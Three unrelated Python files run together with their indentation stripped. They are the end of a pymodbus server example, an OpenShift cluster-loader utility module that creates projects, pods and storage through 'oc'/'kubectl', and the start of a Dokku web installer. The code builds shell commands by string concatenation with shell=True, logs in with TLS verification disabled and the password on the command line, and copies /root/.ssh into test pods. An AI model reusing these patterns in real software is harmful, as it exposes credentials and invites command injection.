store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
|
utils.py
|
#!/usr/bin/env python
import json, subprocess, time, copy, sys, os, yaml, tempfile, shutil, math, re
from datetime import datetime
from clusterloaderstorage import *
from multiprocessing import Process
from flask import Flask, request
def calc_time(timestr):
tlist = timestr.split()
if tlist[1] == "s":
return int(tlist[0])
elif tlist[1] == "min":
return int(tlist[0]) * 60
elif tlist[1] == "ms":
return int(tlist[0]) / 1000
elif tlist[1] == "hr":
return int(tlist[0]) * 3600
else:
print "Invalid delay in rate_limit\nExitting ........"
sys.exit()
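# Examples of the conversion above: calc_time("30 s") == 30, calc_time("5 min") == 300,
# calc_time("2 hr") == 7200, and calc_time("500 ms") == 0 (Python 2 integer division).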
def oc_command(args, globalvars):
tmpfile=tempfile.NamedTemporaryFile()
# see https://github.com/openshift/origin/issues/7063 for details why this is done.
shutil.copyfile(globalvars["kubeconfig"], tmpfile.name)
ret = subprocess.check_output("KUBECONFIG="+tmpfile.name+" "+args, shell=True)
if globalvars["debugoption"]:
print args
if args.find("oc process") == -1:
print ret
tmpfile.close()
return ret
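# Typical usage, as seen throughout this module (the temporary KUBECONFIG copy works
# around the issue referenced above):
#   ret = oc_command("oc get pods -n default", globalvars)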
def login(user,passwd,master):
return subprocess.check_output("oc login --insecure-skip-tls-verify=true -u " + user + " -p " + passwd + " " + master,shell=True)
def check_oc_version(globalvars):
major_version = 0;
minor_version = 0;
if globalvars["kubeopt"]:
version_string = oc_command("kubectl version", globalvars)
result = re.search("Client Version: version.Info\{Major:\"(\d+)\", Minor:\"(\d+)\".*", version_string)
if result:
major_version = result.group(1)
minor_version = result.group(2)
else:
version_string = oc_command("oc version", globalvars)
result = re.search("oc v(\d+)\.(\d+)\..*", version_string)
if result:
major_version = result.group(1)
minor_version = result.group(2)
return {"major":major_version, "minor": minor_version}
def get_route():
default_proj = subprocess.check_output("oc project default", shell=True)
localhost = subprocess.check_output("ip addr show eth0 | awk '/inet / {print $2;}' | cut -d/ -f1", shell=True).rstrip()
router_name = subprocess.check_output("oc get pod --no-headers | head -n -1 | awk '/^router-/ {print $1;}'", shell=True).rstrip()
router_ip = subprocess.check_output("oc get pod --template=\"{{{{ .status.podIP }}}}\" {0}".format(router_name), shell=True).rstrip()
spawned_project_list = subprocess.check_output("oc get projects -l purpose=test --no-headers | awk '{print $1;}'", shell=True)
routes_list = []
for project in spawned_project_list.splitlines():
project_routes = subprocess.check_output("oc get routes --no-headers -n {0} | awk '{{ print $2 }}'".format(project), shell=True)
routes_list.extend([y for y in (x.strip() for x in project_routes.splitlines()) if y])
return localhost, router_ip, routes_list
def create_template(templatefile, num, parameters, globalvars):
if globalvars["debugoption"]:
print "create_template function called"
    # the 'oc process' parameter flag is -v for oc 3.4 and earlier; starting with 3.5 it is -p
if not globalvars["kubeopt"] and (int(globalvars["version_info"]["major"]) <= 3 and int(globalvars["version_info"]["minor"]) <= 4):
parameter_flag = "-v"
else:
parameter_flag = "-p"
if globalvars["autogen"] and parameters:
localhost, router_ip, jmeter_ips = get_route()
extra_param = {}
extra_param['SERVER_RESULTS_DIR'] = os.environ.get('benchmark_run_dir','/tmp/')
gun_env = os.environ.get('GUN')
if gun_env:
extra_param['GUN'] = gun_env
else:
gun_param = any(param for param in parameters if param.get('GUN'))
if not gun_param:
extra_param['GUN'] = localhost
gun_port_env = os.environ.get('GUN_PORT')
if gun_port_env:
extra_param['GUN_PORT'] = gun_port_env
else:
gun_port_set = any(param for param in parameters if param.get('GUN_PORT'))
if not gun_port_set:
extra_param['GUN_PORT'] = 9090
parameters.append(extra_param.copy())
jmeter = any(param for param in parameters if param.get('RUN') == 'jmeter')
if jmeter:
for parameter in parameters:
for key, value in parameter.iteritems():
if key == "JMETER_SIZE":
size = int(value)
num = math.ceil(float(len(jmeter_ips))/size)
globalvars["podnum"] += num
create_wlg_targets("wlg-targets", globalvars)
data = {}
timings = {}
i = 0
while i < int(num):
tmpfile=tempfile.NamedTemporaryFile()
templatejson = copy.deepcopy(data)
cmdstring = "oc process -f %s" % templatefile
if parameters:
for parameter in parameters:
for key, value in parameter.iteritems():
if globalvars["autogen"] and jmeter:
if key == "TARGET_HOST":
value = ":".join(jmeter_ips[(size*i):(size*(i+1))])
elif key == "ROUTER_IP":
value = router_ip
cmdstring += " " + parameter_flag + " %s='%s'" % (key, value)
cmdstring += " " + parameter_flag + " IDENTIFIER=%i" % i
processedstr = oc_command(cmdstring, globalvars)
templatejson = json.loads(processedstr)
json.dump(templatejson, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f "+tmpfile.name + \
" --namespace %s" % globalvars["namespace"], globalvars)
else:
check = oc_command("oc create -f "+ tmpfile.name + \
" --namespace %s" % globalvars["namespace"], globalvars)
if "tuningset" in globalvars:
if "templates" in globalvars["tuningset"]:
templatestuningset = globalvars["tuningset"]["templates"]
if "stepping" in templatestuningset:
stepsize = templatestuningset["stepping"]["stepsize"]
pause = templatestuningset["stepping"]["pause"]
globalvars["totaltemplates"] = globalvars["totaltemplates"] + 1
templates_created = int(globalvars["totaltemplates"])
if templates_created % stepsize == 0:
time.sleep(calc_time(pause))
if "rate_limit" in templatestuningset:
delay = templatestuningset["rate_limit"]["delay"]
time.sleep(calc_time(delay))
i = i + 1
tmpfile.close()
def create_wlg_targets(cm_targets, globalvars):
namespace = globalvars["namespace"]
try:
oc_command("oc delete configmap %s -n %s" % (cm_targets, namespace), globalvars)
except subprocess.CalledProcessError:
pass
ret = oc_command("oc get routes --all-namespaces --no-headers | awk '{print $3}' | oc create configmap %s --from-file=wlg-targets=/dev/stdin -n %s" %
(cm_targets, namespace), globalvars)
return ret
def create_service(servconfig, num, globalvars):
if globalvars["debugoption"]:
print "create_service function called"
data = {}
timings = {}
data = servconfig
i = 0
while i < int(num):
tmpfile=tempfile.NamedTemporaryFile()
dataserv = copy.deepcopy(data)
servicename = dataserv["metadata"]["name"] + str(i)
dataserv["metadata"]["name"] = servicename
json.dump(dataserv, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + tmpfile.name, \
globalvars)
else:
check = oc_command("oc create -f " + tmpfile.name, \
globalvars)
i = i + 1
del (dataserv)
tmpfile.close()
def create_pods(podcfg, num, storagetype, globalvars):
if globalvars["debugoption"]:
print "create_pods function called"
namespace = podcfg["metadata"]["namespace"]
data = {}
timings = {}
data = podcfg
i = 0
pend_pods = globalvars["pend_pods"]
while i < int(num):
if storagetype in ("ebs", "EBS"):
            # an EBS volume/pv/pvc has to be created for every pod, and the pod file has to be updated dynamically
ebs_create(globalvars)
tmpfile=tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
datapod["spec"]["containers"][0]["volumeMounts"] = [{"mountPath" : mountdir ,"name": ebsvolumeid }]
datapod["spec"]["volumes"] = [{"name": ebsvolumeid, "persistentVolumeClaim": { "claimName": ebsvolumeid }}]
# update pod
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, open("podfilexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(datapod, tmpfile)
tmpfile.flush()
elif storagetype in ("ceph", "CEPH"):
ceph_image_create(i,globalvars) # this will create pv/pvc/image - one at time
tmpfile = tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
datapod["spec"]["containers"][0]["volumeMounts"] = [{"mountPath" : mountdir , "name": "cephvol" + str(i) }]
datapod["spec"]["volumes"] = [{"name": "cephvol" + str(i) , "persistentVolumeClaim": { "claimName": "cephclaim" + str(i) }}]
# update pod
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, open("podfilexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(datapod, tmpfile)
tmpfile.flush()
"""
# do here ceph pv test configuration
elif storagetype in ("nfs", "NFS"):
# do here nfs pv test configuration
elif storagetype in ("gluster", "GLUSTER"):
# do here gluster configuration
"""
# here will be added ceph_create/gluster_create / nfs_create / iscsi_create storage backends
else:
tmpfile=tempfile.NamedTemporaryFile()
datapod = copy.deepcopy(data)
podname = datapod["metadata"]["name"] + str(i)
datapod["metadata"]["name"] = podname
globalvars["curprojenv"]["pods"].append(podname)
json.dump(datapod, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
found = False
while not found:
check = oc_command("kubectl get serviceaccounts --namespace " + namespace, globalvars)
if "default" in check:
found = True
check = oc_command("kubectl create --validate=false -f " \
+ tmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + tmpfile.name, \
globalvars)
pend_pods.append(podname)
if "tuningset" in globalvars:
if "stepping" in globalvars["tuningset"]:
stepsize = globalvars["tuningset"]["stepping"]["stepsize"]
pause = globalvars["tuningset"]["stepping"]["pause"]
globalvars["totalpods"] = globalvars["totalpods"] + 1
total_pods_created = int(globalvars["totalpods"])
if total_pods_created % stepsize == 0 and globalvars["tolerate"] is False:
pod_data(globalvars)
time.sleep(calc_time(pause))
if "rate_limit" in globalvars["tuningset"]:
delay = globalvars["tuningset"]["rate_limit"]["delay"]
time.sleep(calc_time(delay))
i = i + 1
del (datapod)
tmpfile.close()
def pod_data(globalvars):
if globalvars["debugoption"]:
print "pod_data function called"
pend_pods = globalvars["pend_pods"]
namespace = globalvars["namespace"]
while len(pend_pods) > 0:
if globalvars["kubeopt"]:
getpods = oc_command("kubectl get pods --namespace " + namespace, globalvars)
else:
getpods = oc_command("oc get pods -n " + namespace, globalvars)
all_status = getpods.split("\n")
size = len(all_status)
all_status = all_status[1:size - 1]
for status in all_status:
fields = status.split()
if fields[2] == "Running" and fields[0] in pend_pods:
pend_pods.remove(fields[0])
if len(pend_pods) > 0:
time.sleep(5)
def create_rc(rc_config, num, globalvars):
if globalvars["debugoption"]:
print "create_rc function called"
i = 0
data = rc_config
basename = rc_config["metadata"]["name"]
while i < num:
tmpfile=tempfile.NamedTemporaryFile()
curdata = copy.deepcopy(data)
newname = basename + str(i)
globalvars["curprojenv"]["rcs"].append(newname)
curdata["metadata"]["name"] = newname
curdata["spec"]["selector"]["name"] = newname
curdata["spec"]["template"]["metadata"]["labels"]["name"] = newname
json.dump(curdata, tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
oc_command("kubectl create -f " + tmpfile.name, globalvars)
else:
oc_command("oc create -f " + tmpfile.name, globalvars)
i = i + 1
del (curdata)
tmpfile.close()
def create_user(usercfg, globalvars):
if globalvars["debugoption"]:
print "create_user function called"
namespace = globalvars["namespace"]
basename = usercfg["basename"]
num = int(usercfg["num"])
role = usercfg["role"]
password = usercfg["password"]
passfile = usercfg["userpassfile"]
i = 0
while i < num:
name = basename + str(i)
globalvars["curprojenv"]["users"].append(name)
# TO BE DISCUSSED
# cmdstring = "id -u " + name + " &>/dev/null | useradd " + name
# subprocess.check_call(cmdstring, shell=True)
if not os.path.isfile(passfile):
subprocess.check_call("touch " + passfile, shell = True)
subprocess.check_call("htpasswd -b " + passfile + " " + name + " " + \
password, shell=True)
oc_command("oc adm policy add-role-to-user " + role + " " + name + \
" -n " + namespace, globalvars)
print "Created User: " + name + " :: " + "Project: " + namespace + \
" :: " + "role: " + role
i = i + 1
def project_exists(projname, globalvars) :
exists = False
try :
cmd = "kubectl" if globalvars["kubeopt"] else "oc"
output = oc_command(cmd + " get project -o name " + projname, globalvars).rstrip()
if output.endswith(projname) :
exists = True
except subprocess.CalledProcessError : # this is ok, means the project does not already exist
pass
return exists
def delete_project(projname, globalvars) :
# Check if the project exists
cmd = "kubectl" if globalvars["kubeopt"] else "oc"
oc_command(cmd + " delete project " + projname, globalvars)
    # project deletion is asynchronous from resource deletion; the command returns before the project is really gone
retries = 0
while project_exists(projname,globalvars) and (retries < 10) :
retries += 1
print "Project " + projname + " still exists, waiting 10 seconds"
time.sleep(10)
# not deleted after retries, bail out
if project_exists(projname,globalvars) :
raise RuntimeError("Failed to delete project " + projname)
def single_project(testconfig, projname, globalvars):
globalvars["createproj"] = True
if project_exists(projname,globalvars) :
if testconfig["ifexists"] == "delete" :
delete_project(projname,globalvars)
elif testconfig["ifexists"] == "reuse" :
globalvars["createproj"] = False
else:
print "ERROR: Project " + projname + " already exists. \
Use ifexists=reuse/delete in config"
return
if globalvars["createproj"]:
if globalvars["kubeopt"]:
tmpfile=tempfile.NamedTemporaryFile()
with open("content/namespace-default.yaml") as infile:
nsconfig = yaml.load(infile)
nsconfig["metadata"]["name"] = projname
with open(tmpfile.name, 'w+') as f:
yaml.dump(nsconfig, f, default_flow_style=False)
tmpfile.flush()
oc_command("kubectl create -f %s" % tmpfile.name,globalvars)
oc_command("kubectl label --overwrite namespace " + projname +" purpose=test", globalvars)
else:
oc_command("oc new-project " + projname,globalvars)
oc_command("oc label --overwrite namespace " + projname +" purpose=test", globalvars)
else:
pass
time.sleep(1)
projenv={}
if "tuningset" in globalvars:
tuningset = globalvars["tuningset"]
if "tuning" in testconfig:
projenv["tuning"] = testconfig["tuning"]
globalvars["curprojenv"] = projenv
globalvars["namespace"] = projname
if "quota" in testconfig:
quota_handler(testconfig["quota"],globalvars)
if "templates" in testconfig:
template_handler(testconfig["templates"], globalvars)
if "services" in testconfig:
service_handler(testconfig["services"], globalvars)
if "users" in testconfig:
user_handler(testconfig["users"], globalvars)
if "pods" in testconfig:
if "pods" in tuningset:
globalvars["tuningset"] = tuningset["pods"]
pod_handler(testconfig["pods"], globalvars)
if "rcs" in testconfig:
rc_handler(testconfig["rcs"], globalvars)
if globalvars["autogen"]:
autogen_pod_handler(globalvars)
def autogen_pod_handler(globalvars):
num_expected = int(globalvars["podnum"])
pods_running = []
pods_running = autogen_pod_wait(pods_running, num_expected)
for pod in pods_running:
rsync = subprocess.check_output(
"oc rsync --namespace=%s /root/.ssh %s:/root/" \
% (pod[0], pod[1]), shell=True)
app = Flask(__name__)
@app.route("/start")
def hello():
return "Hello"
@app.route("/stop", methods=["POST"])
def shutdown_server():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
def start_ws():
app.run(host="0.0.0.0", port=9090, threaded=True)
proc = Process(target=start_ws)
proc.start()
autogen_pod_wait(pods_running, 0)
if proc.is_alive():
proc.terminate()
proc.join()
print "Load completed"
def autogen_pod_wait(pods_running, num_expected):
while len(pods_running) != num_expected:
pods_running = subprocess.check_output(
"oc get pods --all-namespaces --selector=test --no-headers | "
" awk '/1\/1/ && /Running/ {print $1,$2;}'", shell=True).splitlines()
time.sleep(5)
pods_running = [pod.split() for pod in pods_running]
return pods_running
def project_handler(testconfig, globalvars):
if globalvars["debugoption"]:
print "project_handler function called"
total_projs = testconfig["num"]
basename = testconfig["basename"]
globalvars["env"] = []
maxforks = globalvars["processes"]
projlist = []
i = 0
while i < int(total_projs):
j=0
children = []
while j < int(maxforks) and i < int(total_projs):
j=j+1
pid = os.fork()
if pid:
children.append(pid)
i = i + 1
else:
projname = basename
if "ifexists" not in testconfig:
print "Parameter 'ifexists' not specified. Using 'default' value."
testconfig["ifexists"] = "default"
if testconfig["ifexists"] != "reuse" :
projname = basename + str(i)
print "forking %s"%projname
single_project(testconfig, projname, globalvars)
os._exit(0)
for k, child in enumerate(children):
os.waitpid(child, 0)
def quota_handler(inputquota, globalvars):
if globalvars["debugoption"]:
print "Function :: quota_handler"
quota = globalvars["quota"]
quotafile = quota["file"]
if quotafile == "default":
quotafile = "content/quota-default.json"
with open(quotafile,'r') as infile:
qconfig = json.load(infile)
qconfig["metadata"]["namespace"] = globalvars["namespace"]
qconfig["metadata"]["name"] = quota["name"]
tmpfile=tempfile.NamedTemporaryFile()
json.dump(qconfig,tmpfile)
tmpfile.flush()
if globalvars["kubeopt"]:
oc_command("kubectl create -f " + tmpfile.name, globalvars)
else:
oc_command("oc create -f " + tmpfile.name, globalvars)
tmpfile.close()
def template_handler(templates, globalvars):
if globalvars["debugoption"]:
print "template_handler function called"
print "templates: ", templates
for template in templates:
num = int(template["num"])
templatefile = template["file"]
if "parameters" in template:
parameters = template["parameters"]
else:
parameters = None
if "tuningset" in globalvars:
if "templates" in globalvars["tuningset"]:
if "stepping" in globalvars["tuningset"]["templates"]:
globalvars["totaltemplates"] = 0
create_template(templatefile, num, parameters, globalvars)
if "totaltemplates" in globalvars:
del (globalvars["totaltemplates"])
def service_handler(inputservs, globalvars):
if globalvars["debugoption"]:
print "service_handler function called"
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
for service in inputservs:
num = int(service["num"])
servfile = service["file"]
basename = service["basename"]
if servfile == "default":
servfile = "content/service-default.json"
service_config = {}
with open(servfile) as stream:
service_config = json.load(stream)
service_config["metadata"]["namespace"] = namespace
service_config["metadata"]["name"] = basename
create_service(service_config, num, globalvars)
def ebs_create(globalvars):
    # This function creates the EBS volume, pv and pvc; the EBS volume id is reused as
    # both the pv name and the pvc name. The names themselves do not influence anything.
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
global ebsvolumeid
ebsvolumeid = ec2_volume(ebsvolumesize,ebsvtype,ebstagprefix,ebsregion)
with open("content/pv-default.json", "r") as pvstream:
pvjson = json.load(pvstream)
pvjson["metadata"]["name"] = ebsvolumeid
pvjson["spec"]["capacity"]["storage"] = str(ebsvolumesize) + "Gi" # this has to be like this till k8s 23357 is fixed
pvjson["spec"]["accessModes"] = [pvpermissions]
pvjson["spec"]["awsElasticBlockStore"]["volumeID"] = ebsvolumeid
pvjson["spec"]["awsElasticBlockStore"]["fsType"] = fstype
pvtmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvjson,open("pvebsexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvjson,pvtmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvtmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvtmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + pvtmpfile.name , globalvars)
pvtmpfile.close()
with open("content/pvc-default.json", "r") as pvcstream:
pvcjson = json.load(pvcstream)
pvcjson["metadata"]["name"] = ebsvolumeid
pvcjson["metadata"]["namespace"] = namespace
pvcjson["spec"]["resources"]["requests"]["storage"] = str(ebsvolumesize) + "Gi"
pvcjson["spec"]["accessModes"] = [pvcpermissions]
pvctmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvcjson, open("pvcebsexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvcjson,pvctmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvctmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvctmpfile.name, globalvars)
        # why do we have both kubectl and oc here? kubectl alone would do for both cases
else:
check = oc_command("oc create -f " + pvctmpfile.name, globalvars)
pvctmpfile.close()
# this function creates CEPH secret
def ceph_secret_create(cephsecret,globalvars):
namespace = globalvars["namespace"]
with open("content/ceph-secret.json") as cephsec:
cephsecjson = json.load(cephsec)
cephsecjson["metadata"]["name"] = cephsecretname
cephsecjson["metadata"]["namespace"] = namespace
cephsecjson["data"]["key"] = cephsecret
sectmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(cephsecjson, open("cephseckey.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(cephsecjson, sectmpfile, sort_keys=True, indent=4, separators=(',', ': '))
sectmpfile.flush()
# create ceph sec
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + sectmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + sectmpfile.name, globalvars)
sectmpfile.close()
# this function will create pv/pvc based on ceph image
def ceph_image_create(i,globalvars):
"""
This function will prepare pv/pvc file for case when pods
will use gluster volume for persistent storage
"""
namespace = globalvars["namespace"]
globalvars["curprojenv"]["services"] = []
cephimagename = "cephimage" + str(i)
imagesize = 1024**3*int(cephimagesize)
# ceph_volume function will create ceph images at ceph storage cluster side
ceph_volume(cephpool,cephimagename,imagesize)
with open("content/pv-ceph.json") as pvstream:
pvjson = json.load(pvstream)
pvjson["metadata"]["name"] = "cephvol" + str(i)
pvjson["metadata"]["namespace"] = namespace
pvjson["spec"]["capacity"]["storage"] = str(cephimagesize) + "Gi" # this has to be like this till k8s 23357 is fixed
pvjson["spec"]["accessModes"] = [pvpermissions]
pvjson["spec"]["rbd"]["monitors"] = [x + str(":") + str(6789) for x in cephmonitors]
pvjson["spec"]["rbd"]["pool"] = cephpool
pvjson["spec"]["rbd"]["image"] = "cephimage" + str(i)
pvjson["spec"]["rbd"]["user"] = "admin"
pvjson["spec"]["rbd"]["secretRef"]["name"] = cephsecretname
pvtmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvjson,open("pvcephexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvjson,pvtmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvtmpfile.flush()
# create pv
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvtmpfile.name, globalvars)
else:
check = oc_command("oc create -f " + pvtmpfile.name , globalvars)
pvtmpfile.close()
with open("content/pvc-default.json", "r") as pvcstream:
pvcjson = json.load(pvcstream)
pvcjson["metadata"]["name"] = "cephclaim" + str(i)
pvcjson["metadata"]["namespace"] = namespace
pvcjson["spec"]["resources"]["requests"]["storage"] = str(cephimagesize) + "Gi"
pvcjson["spec"]["accessModes"] = [pvcpermissions]
pvctmpfile = tempfile.NamedTemporaryFile(delete=True)
json.dump(pvcjson, open("pvccephexample.json", "w+"), sort_keys=True, indent=4, separators=(',', ': '))
json.dump(pvcjson,pvctmpfile,sort_keys=True, indent=4, separators=(',', ': '))
pvctmpfile.flush()
if globalvars["kubeopt"]:
check = oc_command("kubectl create -f " + pvctmpfile.name, globalvars)
        # why do we have both kubectl and oc here? kubectl alone would do for both cases
else:
check = oc_command("oc create -f " + pvctmpfile.name, globalvars)
pvctmpfile.close()
# gluster_image_create and nfs_image_create will be added later, e.g.:
#   def gluster_image_create(): ...
#   def nfs_image_create(): ...
def pod_handler(inputpods, globalvars):
if globalvars["debugoption"]:
print "pod_handler function called"
namespace = globalvars["namespace"]
total_pods = int(inputpods[0]["total"])
inputpods = inputpods[1:]
storage = inputpods[0]["storage"]
global storagetype,ebsvolumesize, ebsvtype, ebsregion, ebstagprefix, mountdir, \
pvpermissions, pvcpermissions, nfsshare, nfsip, volumesize, glustervolume, \
glusterip, cephpool , cephmonitors, cephimagesize, cephsecret, cephsecretname, fstype
if storage[0]["type"] in ("none", "None", "n"):
storagetype = storage[0]["type"]
print ("If storage type is set to None, then pods will not have persistent storage")
elif storage[0]["type"] in ("ebs", "EBS"):
storagetype = storage[0]["type"]
ebsvolumesize = storage[0]["ebsvolumesize"]
ebsvtype = storage[0]["ebsvtype"]
ebsregion = storage[0]["ebsregion"]
ebstagprefix = storage[0]["ebstagprefix"]
mountdir = storage[0]["mountdir"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("Storage type EBS specified, ensure that OSE master/nodes are configured to reach EC2")
elif storage[0]["type"] in ("nfs", "NFS"):
storagetype = storage[0]["type"]
nfsshare = storage[0]["nfsshare"]
nfsip = storage[0]["nfsip"]
mountdir = storage[0]["mountdir"]
volumesize = storage[0]["volumesize"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("NFS storage backend specified, ensure that access to NFS with ip", nfsip, "works properly")
elif storage[0]["type"] in ("gluster", "GLUSTER"):
storagetype = storage[0]["type"]
glustervolume = storage[0]["glustervolume"]
glusterip = storage[0]["glusterip"]
mountdir = storage[0]["mountdir"]
volumesize = storage[0]["volumesize"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
print ("Storage type Gluster specified, ensure access to Gluster servers", glusterip, "works properly")
elif storage[0]["type"] in ("ceph", "CEPH"):
storagetype = storage[0]["type"]
cephpool = storage[0]["cephpool"]
cephmonitors = storage[0]["cephmonitors"]
cephimagesize = storage[0]["cephimagesize"]
cephsecretname = storage[0]["cephsecretname"]
cephsecret = storage[0]["cephsecret"]
mountdir = storage[0]["mountdir"]
fstype = storage[0]["fstype"]
pvpermissions = storage[0]["pvpermissions"]
pvcpermissions = storage[0]["pvcpermissions"]
        # if CEPH is specified, the ceph secret has to be created on the OSE master
        # before creating any pv/pvc/pod; the secret only needs to be created once,
        # so this is treated as a one-time setup step
ceph_secret_create(cephsecret,globalvars)
print ("Storage type CEPH specified, ensure that OSE master is configured to reach CEPH cluster and ceph monitors", cephmonitors)
globalvars["curprojenv"]["pods"] = []
if "tuningset" in globalvars:
globalvars["podtuningset"] = globalvars["tuningset"]
globalvars["pend_pods"] = []
if "podtuningset" in globalvars:
if "stepping" in globalvars["podtuningset"]:
globalvars["totalpods"] = 0
for podcfg in inputpods:
num = int(podcfg["num"]) * total_pods / 100
podfile = podcfg["file"]
basename = podcfg["basename"]
if podfile == "default":
podfile = "content/pod-default.json"
pod_config = {}
with open(podfile) as stream:
pod_config = json.load(stream)
pod_config["metadata"]["namespace"] = namespace
pod_config["metadata"]["name"] = basename
create_pods(pod_config, num,storagetype, globalvars)
if globalvars["tolerate"] is False:
if len(globalvars["pend_pods"]) > 0:
pod_data(globalvars)
if "podtuningset" in globalvars:
del(globalvars["podtuningset"])
del(globalvars["totalpods"])
del(globalvars["pend_pods"])
def rc_handler(inputrcs, globalvars):
if globalvars["debugoption"]:
print "rc_handler function called"
namespace = globalvars["namespace"]
globalvars["curprojenv"]["rcs"] = []
for rc_cfg in inputrcs:
num = int(rc_cfg["num"])
replicas = int(rc_cfg["replicas"])
rcfile = rc_cfg["file"]
basename = rc_cfg["basename"]
image = rc_cfg["image"]
if rcfile == "default":
rcfile = "content/rc-default.json"
rc_config = {}
with open(rcfile) as stream:
rc_config = json.load(stream)
rc_config["metadata"]["namespace"] = namespace
rc_config["metadata"]["name"] = basename
rc_config["spec"]["replicas"] = replicas
rc_config["spec"]["template"]["spec"]["containers"][0]["image"] = image
create_rc(rc_config, num,globalvars)
def user_handler(inputusers, globalvars):
if globalvars["debugoption"]:
print "user_handler function called"
globalvars["curprojenv"]["users"] = []
for user in inputusers:
create_user(user, globalvars)
def find_tuning(tuningsets, name):
for tuningset in tuningsets:
if tuningset["name"] == name:
return tuningset
else:
continue
print "Failed to find tuningset: " + name + "\nExiting....."
sys.exit()
def find_quota(quotaset, name):
for quota in quotaset:
if quota["name"] == name:
return quota
else:
continue
print "Failed to find quota : " + name + "\nExitting ......"
sys.exit()
|
dokku-installer.py
|
#!/usr/bin/env python3
import cgi
import json
import os
import re
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.19.10'
def bytes_to_string(b):
if type(b) == bytes:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
b = b.decode(encoding)
b = b.strip()
return b
def string_to_bytes(s):
if type(s) == str:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
s = s.encode(encoding)
return s
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', None)
if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
key_file = '/home/ec2-user/.ssh/authorized_keys'
elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
key_file = '/home/ubuntu/.ssh/authorized_keys'
else:
key_file = '/root/.ssh/authorized_keys'
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
except subprocess.CalledProcessError:
pass
ufw_display = 'block'
try:
command = "sudo ufw status"
ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
if "inactive" in ufw_output:
ufw_display = 'none'
except subprocess.CalledProcessError:
ufw_display = 'none'
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
command = "test -x /usr/bin/openresty"
subprocess.check_output(command, shell=True)
nginx_dir = '/usr/local/openresty/nginx/conf'
nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
